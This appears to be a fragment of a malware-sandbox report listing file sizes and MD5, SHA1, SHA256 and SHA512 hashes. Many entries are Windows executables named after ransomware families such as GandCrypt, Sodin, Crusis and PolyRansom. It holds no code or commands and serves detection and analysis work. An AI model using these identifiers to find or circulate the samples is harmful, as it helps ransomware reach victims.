SHA5129703be513b2b2ea1f5cb86c1c9707f947c3302cbd38967c71bc4fda9ae9a87fcedce112ca980cba1a558daa17d9c3a41d7c353ac16f6d43192e7a01c024bb40a
-
Filesize
120B
MD5db0bba4f1e9ed98d109095d0783f789a
SHA1ae744b77d0f3b71f48b550998dc4ddb8e8af7005
SHA2562f43a9dc93251ec3ac8a306020f5f4069c26a638171fc228431098e41d6984a6
SHA51260df02c0187f0a90a4c47679523ba1f2b3ad4a1a34d4ccf69ef48bb47aa771a5af3edf84c0e45a031f185c451eea89916829002f391621f1d18f9a2242220a07
-
Filesize
6KB
MD5ff0cb7b73da19b44688643a12caea207
SHA15996ceb9b6db13eed65f6c1f6c5c482874e6cb2a
SHA2566a5c386280f464670e0ac9429875c81811133b711bbce5887dd2cbcff9b97fda
SHA51248013b94af40b6f338ac861256b3bcf24cf07051103b081b7a0777e704c34d91c19ace7047de1253498ff4b1cc6f01d01cd815df43935c5aa551a12c1d9ecf9d
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
270B
MD59fd8525d3f3cbaacc4bc5c721d85d9ad
SHA192b7abe1dea93a5f1ea499a52982c3b2923d670b
SHA25659acb1b88a8af0600e30224c8d7342cb6a5efd7f6c210a14b420ddfa7f724782
SHA51214f90ec836200a69c487dfdaa7728d2903447fbf76f2cad4464d45f02f782e664d0654c601c7446b6bb26cf37df5f6dffef2c2a4941ba8d97ee5ea005663e552
-
Filesize
177B
MD58b59e4e66c0735f024452c52bca84fcb
SHA195b9dcfd7188bc6dbbbef241ec68f685ddb6c234
SHA2564d9d0f06216e950be6d62a0b0514f5a81f8a38bc973a4cd12efe7219e0d203f2
SHA512669f113a132e1c3a2ad379d9381294e269364d386038994cfb2120dee028d63c3a0288400731349a51be9a4ca00c0cead4eb4dc6d7f33b6a198fb8f212baf4bf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
680KB
MD5bebdf3702e0a2fd254f27ec6f33895d1
SHA1a672ca4ad198966deec7c2c7aae509d15ea4b556
SHA2560820b0be5e8bad70d1f22e081cf5a177b5352be768418702ee72563a48c0f0bc
SHA5126f6da4518db3f943710a1f6ed4185bf268f536446ba27255f50166bb47227f30efd7c4f69a3e038af1bb7d45d591d86a3bde983d3a43869d45c9a6108ea31aaa
-
Filesize
308KB
MD585cb856b920e7b0b7b75115336fc2af2
SHA11d1a207efec2f5187583b652c35aef74ee4c473f
SHA2566fff20aabe8265b6e811c9dbcb987f9c15cf07d1d8b80ced7b287d96900f5c62
SHA512120ff9c77c19216e5691b6ba812f09f7db7b46685a391027fff56e5b73200f4211b6bac2c2d28cdfe461d1fbf10f1a3204adeedbd0a34a034a862c6278d901e8
-
Filesize
1KB
MD51ef061fcdc2f3486d8ec0ab29e180380
SHA1d9f4d75713598520ac39c23bdec88d513e8f6cd5
SHA2560c44f85a7e0124657b1fdf8fc9b48daa2f6a57a9b7a393cd48ddafa7ba81baa8
SHA5126847609fe3b549eda58e20bee7d8897050289d472d5964a5109533c4310fb4acd424fb16c8eeb7e7969dba5eab873098ebbf4ca58a4a4021e9a342f89782a251
-
Filesize
1KB
MD509063e7cc0d66a9aed53f2e2d2409103
SHA196f8fa15b5a3b2646f6691770a158c69ea7405a4
SHA256369b159ef60c988373a3c85e0b10b5ff2178504465f11965ab0d66f14124f9a1
SHA512c460a3cab70270c5cefe0464df6ddb9d50bb58ac9c49c7e62c9a55cc6bc30b6411cbc28ae418dd91b1ba1190f8394ccd937452ae70d7062740207d2ffc68e2ec
-
Filesize
120B
MD54dd89c8034ead9942f4d650f6913c6ec
SHA1063af97170256e20ba69cd71c779100d703e0a94
SHA256a5e56333e6dff7c5fc2d457ba46a5543c65303a420922f590fa7d8077fe3d1b8
SHA512456dd015d30f17494bd38411a6df5daaa86f3ec34170122c0f2ae1deaa9e13b920f25e7ba7ba9e7ff8c12de4ab862e2cfba9eed58c62c511a00ae4447bc4e57b
-
Filesize
120B
MD587626653e9b65435589c97868c20a88f
SHA194f71814c1ccc8f535d3fab99b79a57cc564c9db
SHA25618d50ee213c07a3113851a5e93ad61c04d702a7785dd2d90944849f9681146c4
SHA512f1033427298b85dba19557d1fc3c12689a18dbbaad612721a175fd0901445ee0404608e5359e33ee47bf2c98d97cfa8246dd05075fb5c71b942f5274e174cf49
-
Filesize
120B
MD5a254e6d0568ab57dda3518a7e1e9b5a6
SHA14b30548872d710b83dad937d23d5e7c3eff2f173
SHA2562be772726ac5eb091e524592ba0c322b34bcf21806e24229f2ca5fa0d252312f
SHA512a0cd56dba9c9311f477ff2a38b981c4add9ebf2f5f7788117e9e3a9ddb2450074ddcf43eb331d3e5cd61e82ff4a11dd08941cae8ca215d5b20f22ddda833c60a
-
Filesize
3KB
MD589ab80eff36c4c82913fabf8ba57a841
SHA1873f57d37ee12a19d07d69bc5409f7fa2963f6aa
SHA256d9912017f3560c7f0dc5ab5012dfe370da9520dc37e8021f64fd4eb7493deac6
SHA512c2f122ba707f9f6597732ad5249ee8295d21d558fd1fa9c93804ec6e5e2cb456c5bd25f1dd544117778b9904880c3cf2aea229369b2c463fb12257df96ad2610
-
Filesize
1KB
MD50d55ccd5ab069c265e155feadf8ab31e
SHA14f18da83183059b1ddb9543c3fdc6826ce039b38
SHA256e1e20ba8a750f14cc0bc58a678e817e677e6fe33063ecf63b4522a27a9a1826a
SHA51223b116c57bceaa79e59b6956e3d9dbd3af4d2bdad4296f21f225a1e38e52e1155cffa5bceaabceaf1486da71f090390f2985a286c7e7155fad308bbfdf49a4eb
-
Filesize
1KB
MD589baad54bd727f0def2b4b772ad55b11
SHA1b67c44727d2a6c8f28cac366ac68b13d2e236a1c
SHA256751779fd9de0f089b8ca9b9d70a520e97e1a3a96e44cfe60ee7dc56a5c4e2fec
SHA5127ff2c9ceb4cac1564af52cfc484d37a281099deeb8a70fe177998765a594429931e79ae93ea1b0f985749dc6159b77feb7c27c3e9f1ee9e295a5451c8fa8fa8e
-
Filesize
277KB
MD523a4b2a548bf41b158c3c86926f3a421
SHA115b0c5b4fd5172afeabbe79cae8abdba5c633f5f
SHA256bcabf51412999e8178714b1fcc77d7ec903550d7f27c5dbff4baf6f2b2bd87e1
SHA51260ab60d5e0319e666997a2569e9dd0f9b7ea099291c19eb0da07645b9130a16a74c73e0319259ae07dbbf7001808774a68f94e164e81793da99d30163ed5824d
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
Filesize9.1MB
MD580c092fa7a3558e429c0667cfe1180a1
SHA18f430367ad843012f8a0d1901103c8d7546d843d
SHA2565a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6
SHA512ce1a67abd9ff7396add8dce6379715cfdb5a6e4d59714584232438f80cfa910bf815e15bf7f47535969d830c8f3ac984fca6c5be6c52a6c2ad05a0ebdfc66863
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
Filesize18.5MB
MD525eac44d1f1fe74ce1a685d5c58641a5
SHA1ca5ee3f8b495f0d8098fe980201b237d75b0dcc9
SHA2561c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1
SHA512d6d7c3326f175c908b35155c2454a5a6c1e44c07f2fcb673ab934cb852597a729d63c3dfbc3934861ee3fa59ccb4f0ad194372c591a17b02734c9ee92442ca2d
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
Filesize620KB
MD59d61337a7076d907d0a5282003adf16c
SHA162a7d89391337e8e52d65efa4d2456e7d28a2cdf
SHA256ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d
SHA512674df81e9201dc39d215b1991fda1c9b41cc04a0fb4be307611d3637089e0fe49bceefe9a402ee9155e313a985359eadb461da9f86327773bbf8b0d66cc68f80
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe
Filesize153KB
MD53bc973336362358e56f37bd8248c95bf
SHA129029f3d74030e7164cc02a5f49b97ca3df9a165
SHA256d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477
SHA5124616254879b2c9cbf83b2e7b38072c00d2033542ccdd882c9c6e05ba4e273048fdceb37d5c54a4fb86a3f522b2ed68f37bf4e4d1dde054b554841d5e24b5d0b4
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
Filesize207KB
MD557ed1649e1f2d050822aee1c41116b21
SHA152ad6d4bc8249915726e4771887ee0356c221bca
SHA256575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317
SHA5120781a7a31fc28f49c6162bbd10c8bc6e6b11ae94ed40b69fdcd257be06e4fa3b54ee4c2177991e15f13f381a945edabf3408237fca4598eebcd890fba4facd3f
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe
Filesize724KB
MD5fec13c19368b0a81ff677e79327db701
SHA14dc301e93090246267497f17da300fb5aa1e697c
SHA256b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca
SHA512fdff71c786300b77cd9517dc6f378e38567984cc5465fb962302bc57f698fc9facb0aafab4bd54ed344418c8fb4138998e263f094b29f622318fa60f014afcf8
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
Filesize905KB
MD5b194d8a14ae891b56e5886441c32bc5d
SHA1d5b7686c6e206bff524ecb551de00d4d9fd09821
SHA25679257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c
SHA5125197b10868998eb11da1ffb78a8e955f83b18c9cdf1e6b4a6a0d49e4179bf4735d455686b793d1fc2e4f5452cf319b7cd006f2097f85e7ea00188f9c16ea975b
-
Filesize
97B
MD594ae8beef2858d4c2348fa93ef5cc11b
SHA1e14a580f76d4137a72d40b6090f91300ee1c6c49
SHA256940f12d8c26cc565467b1f1190492a388e9ae3e9ebe07c90db8342a0266318b7
SHA51261df814a2086044627112752faf2d706c248876a3ac1415a0c31a879b457492cfa228b6cb0696a561546978db84e2833e40d80a961bdde3c5c2ebb48ed1e3340
-
Filesize
364B
MD51560ad69f3d8ef6de776615718886829
SHA1d93259a8b8aaa877132008401fa4fb1efdafc7a2
SHA256d9cff02776e102bb1eb66357606991fd36af806ae26df220c37949dca527129a
SHA512e384461b402e827a91391a27a838e115b780f09edcba645781b94e9fcbc77ceb69948b51f6345b8d8db7b9b8b4c9256a29285f163b1ee7c65a524ae302cddf5f
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
Filesize492KB
MD5247793dd4767d01db778fedab55a2ac4
SHA130373590eb19df45d97a4d13545e9e45f22283a9
SHA256ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828
SHA5122155b0c45ccc013c860c19e4ab0dccd34df802e046f3200bfd8c2419bcb9764f03b6d23e13dd0bf02c28fc7555f09ee330e32e264fde66e035b33d09b406c669
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe
Filesize62KB
MD59b037ead562c789620a167af85d32f72
SHA12a7a7385e431dd80f7e84c38417e85de21b84491
SHA25661ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd
SHA5121d8cbe66adf276c4ba37060966441bfffb8ca635dbcf604425aa5310613e745dde8bd641c8ec231cc4cf89c5ebdf27db60ae0805b665a6a473a38011b31f3687
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
Filesize654KB
MD5d02e4dc2873794442422e9e7ab984629
SHA133fe022ead73e2cab2afbd57ed5a43babb3b0833
SHA2566518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71
SHA512ef0efac29a348e95ec370e27555ad40fccb49afc4461f2791618a7d58417064482912e39c33aaa8115ac727977067ecb1fdee25428846523541020742320c289
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
Filesize425KB
MD5a204a6598182464aec31426ef3190cf1
SHA15af8a417b66cd5a20ae4c01d648ce5f26a1e9ef1
SHA2560df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca
SHA5120e6e05645cc59f21a6671d401b939f5504038f24c78e2f8a6756e962af791a9e7667828716ec8e52016f131d34e8d075a95cef4a803a8b3b023591d8efbc5bb8
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe
Filesize90KB
MD56ece5235cd0d1933632aad75d1a12866
SHA11dafe8283cc17c9bacc0da723e83f67839bbd10f
SHA2566ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc
SHA51218e1661424d4bf21f6b226799d2668d4926adcc853b0038b1252f6af121f277300a0f780432a157b34b38edc4acf4e801c6e2772f4e288f5c71160bd7d34a5cc
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
Filesize277KB
MD5ec3bc944c4c8844d63acdba9e36e67c9
SHA101a74db6a1c8d2064de42c73555d2a3644dc369a
SHA256bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162
SHA5127fb8b88ad47525b284aa005a1b3045c89fd424eece83b599d4271ebc2499cae5a32e642df04427548ea9e33183b2829c04d6e1a3fc287aff6ac9d6d96648e660
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Filesize73KB
MD52e48c5bf4d010e2d9b84cd6609be31fe
SHA17de0171256e4c124b9ad0c2d7ee8d3e29665a88c
SHA2569cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044
SHA512e51e6dc48e0193fe45f8005e9732660e8f60324316386c587fc63a2f6c140c9a80a49d5cab667a493ef2312f12aea0d9e8bea035a8c798a4ce0f72b0931a50dc
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
Filesize569KB
MD518bde2c42d6c5c9f6bd3de90b41442e8
SHA11e37d2c188baae947933837729f6907fea46f567
SHA256f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f
SHA512c8ad21be25ffbb1e2ee15a5c17ed7bcdb964720886860bf7e00efee6d93b853e3f3dd824939bcff592227a73cee2f6c667b2b442cd603c7e0446ae732ec12227
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
Filesize323KB
MD5dfe0390e501faf0de5ba5093304e8ac2
SHA1266ca584a811b8ccd4d513a0b007d206575a60a9
SHA256666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6
SHA5120423b083ada2a6c201cf777d14e74e73d9484c9f34f8681e86e4265e80ee50a5c454c55c5d6e9dbc858abeb97c28bd51d44fe4dd113a7a54ebe6a15241de7373
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
Filesize166KB
MD5c56a3e49ee5c97fde412cad37071632a
SHA1dfb1f4170182ca86baf13119c29358d2dcccb49a
SHA2564f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e
SHA512f15315237081dff5dd535a509ed68d3fbf3509fc5ac6e4a2b74ab6b963ade67427a2fca6451cfdd31fd075aa50e3864ab45400e438e42f54f4ecded01380c9ca
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe
Filesize165KB
MD502b3f1d1606d2698cae94764d2ddafe8
SHA1a89709026d78845a0feba76bb61789da21d9a821
SHA2563fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b
SHA512f6b8d0c7f0f70a021f685b20ea52f434b4e0ce28e38d3f6c0b00247bf98fc6de76b4dba6d0ebee280b37ccde60020a0aff208e7214cadf753151d7fc890572af
-
Filesize
7KB
MD50ef23d23f72b7b4353472e1f4d69872c
SHA1f51ca376e618edef25e309a9afcc123778123013
SHA256e977b87e5a60d4e8ab53ab3ca29ed50a7faee47968d9d761a7d48180730db855
SHA512e673f0ce8d0c39720a0f158c3cc765586970c766f7bb8b5413728d5cc12b7028ad3c28c9fd3638abad509ff4b5d29b5d3f8f1df63554d295add4548cc33adb4e
-
Filesize
145B
MD5ca13857b2fd3895a39f09d9dde3cca97
SHA18b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0
SHA256cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae
SHA51255e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47